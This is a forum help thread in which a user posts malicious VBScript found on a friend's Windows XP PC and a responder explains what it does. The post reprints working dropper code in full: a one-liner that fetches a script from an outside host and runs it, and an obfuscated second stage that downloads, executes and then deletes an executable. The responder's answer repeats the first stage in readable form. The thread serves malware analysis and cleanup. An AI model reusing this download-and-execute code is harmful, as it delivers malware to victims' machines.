Question : Could an expert please try to interpret this VBS code

Hello experts

A friend has been seeing some unusual behaviour with her Windows XP SP3 IE7 computer over the past couple of days that I am deeply suspicious of.  I observed it happening over a VNC connection just a short time ago.

A CMD.EXE window pops up and obviously waits.
A VBS file opens in Notepad.
When Notepad is closed, the CMD window closes.

I'm pretty sure that this is a malicious script attempting to run the VBS file without specifying the program (CScript or WScript) to run it, and because I have set the default action for most "script" type file types to the "Edit" action (Notepad) rather than the "Open" one (execute script), the malicious activity is probably failing.

On the first occasion that I didn't witness, the file "yb.vbs" was opened in Notepad from the user's %TEMP% folder with the following content:

1:
B="yb.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://jyiop.com/kr/yb.vbs",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B


I safely downloaded "http://jyiop.com/kr/yb.vbs" and saw that the contents were crudely "obfuscated" by reversing some of the parameters as shown below:

1:
2:
3:
4:
5:
6:
7:
8:
w=3000:x=200:y=1:z=false:a = "http://jyiop.com/kr/hy/_q.php?&":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):b = e.GetSpecialFolder(2) & "\exe.exe":OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA"))
Set o=Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS"))
On Error resume next
c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close
End If
CreateObject(StrReverse("llehS.tpircSW")).eXeC b:CreateObject(StrReverse("llehS.tpircSW")).eXeC "taskkill /F /IM wmplayer.exe":Set g=o.GetFile(e.GetSpecialFolder(2) & "\" & StrReverse("sbv.by")):g.Delete:WScript.Sleep w:Set g=o.GetFile(b):g.Delete


I safely downloaded the referenced "http://jyiop.com/kr/hy/_q.php" to reveal this code:

1:
<META  HTTP-EQUIV="Refresh" CONTENT="0; URL=../_yoyk.php">


I know that it's not always possible to get a *.php file from a server intact by normal means (ie. Make a link to it and Right-Click > Save Target As > save as *.htm file of same name) and with the proper code, so that may just be the server's response to my attempt to download the file.

Assuming the relative URL equates to:  http://jyiop.com/kr/_yoyk.php
then that resolves to http://www.google.com
I am testing this on my own system with http://www.google.co.uk as the home page, so I know that it is not just redirecting to my home page.

On the subsequent occasion that I witnessed over VNC a command was obviously issued to run the file "uor.vbs" from the user's %TEMP% folder in a command window, and notebook popped up containing the script:

1:
B="uor.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://ypuii.com/k_/uor.vbs",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B


Safely downloading and opening "http://ypuii.com/k_/uor.vbs" in a text editor revealed the same as before, ie. reversed strings.

Now, I have found that "GetSpecialFolder(2)" refers to the user's %TEMP% folder, and I can see that the script is downloading the VBS file, creating a VBScript on the fly by concatenating strings and reversed strings, but I am unsure of exactly what a script like this is doing or trying to do.

I am not very conversant with VBS other than some basic usage, so the following references are a puzzle to me:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close


I can see as plain as day that Windows Media Player is being killed off if it is running (which it wasn't at the material times), but I wonder why a script would be doing this.

One other apparently significant issue is that I discovered a "recently typed URL" in the user's IE Address Bar drop-down list to:
http://ypuii.com/k_/zcus/efmjcg.pdf
I couldn't find that file cached anywhere on the user's computer and she can't even recall when she would have last opened a PDF file in her browser.  I saved that PDF file and, on inspection in a text editor, I can see some text content as some kind of scripted code and a reference to "JavaScript".  The following is also clear in a text editor:

/Author (MllZTgg yZ=ssA f V )
/gZ (. b LPD tv/-Xqrf4dY3M s_JUNCVZa #8l=z 96yp2x :S5Rm k o 0&uFOcj% ihwBQn E K7gATGe H?I1W)
/Title (Ng JGgG qgMpr#AZMZH?)
/Keywords (Mokomeuapaualimajsi)
/Creator (Kotefekjoesito)
/ModDate (D:20100621095906)
/Producer (820d5Deawohigejoxamogoga)

Googling just the "Creator" name "Kotefekjoesito" takes me to this page:
http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753
where it clearly shows that the file is Malicious.

I can only guess that the earlier reference in the VBScript to "ADOBD.Stream" is a reference to "Adobe", and to a stream in a maliciously crafted PDF file.  I can only assume that this was either the start of the issue, or that it was a file fetched by a malicious script, but I wouldn't have thought it would have added the URL to the recently typed URL list.  That's puzzling in itself.

Probably not a coincidence is that googling   StrReverse("maertS.BDODA")   also takes me to the "http://jsunpack.jeek.org" site with this page:
http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e
but it doesn't say that is malicious.

Could someone please advise me what that first script is likely to have done (or attempted to do) on the user's computer.  I would like to know where I stand, because a full system AntiVirus + RootKit scan has yielded no positive results and I cannot see any references to the VBS files in the registry.

Thanks in advance

Bill

Answer : Could an expert please try to interpret this VBS code

I am not willing to go as far as opening the websites you mentioned however, from the scripts above here is what I see...

Script 1 is creating a blank file, links to a website and downloads the content of the page and dumps it into the blank file.  This file is saved as "yb.vbs" and is supposed to execute.
-------------------------------------------------------------------
B="yb.vbs"
With CreateObject("MSXML2.XMLHTTP")
      .open "GET","http://jyiop.com/kr/yb.vbs",false
      .send()
      Set A = CreateObject("Scripting.FileSystemObject")
      Set D = A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B)
      D.WriteLine .responseText
End With
D.Close
CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B
-------------------------------------------------------------------
Step 2 Now that the vbs file has been created and run, it tries to visit another webpage but this time saves the web page content into a file called "exe.exe".  This new file is to be saved into the users temp folder.
The script then runs the file "exe.exe".
As you mentioned, taskkill stops Windows Media player - why, who knows?!?!
The script then deletes the vb script that step 1 created (the script that is currently running).
There is a 3 second wait then the file "exe.exe" is deleted.

This part;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z:c.send()
If c.Status = x Then
u=c.ResponseBody:d.Open:d.Type = y:d.Write u:d.SaveToFile b:d.Close]
is the script typing to open a file which will stream in the webpage - nothing to do with Adobe.  "c.Status" - the script is waiting for the webpage to be ready and fit to download. "u=c.ResponseBody" takes the web page and shoves it into a variable.  The stream is opened and the text is downloaded into the variable.  The file is saved and closed.  In this script the webpage/file is saved into the temp folder as "exe.exe".

The real danger is that "exe.exe" file.  Once it has been run, there is no telling what it was designed to do.

That computer is still infected with a virus.  The program "exe.exe" could have downloaded other viruses in the background to impede scans of the system.  The fact that you can see the command window open and the script is attempted to run tells me there is some malicious file still lingering.

It may be time to evaluate what needs to be saved from that machine and start afresh with a re-install of Windows and applications.  It sounds dramatic but seeing as the antivirus is not detecting anything out of sorts I think you are at the point of no return.  Remember that as long as the malicious code is on there, any drive; be it USB memory stick, camera etc., can potentially contain the virus/trojan, if it was attached to the machine.
Random Solutions  
 
programming4us programming4us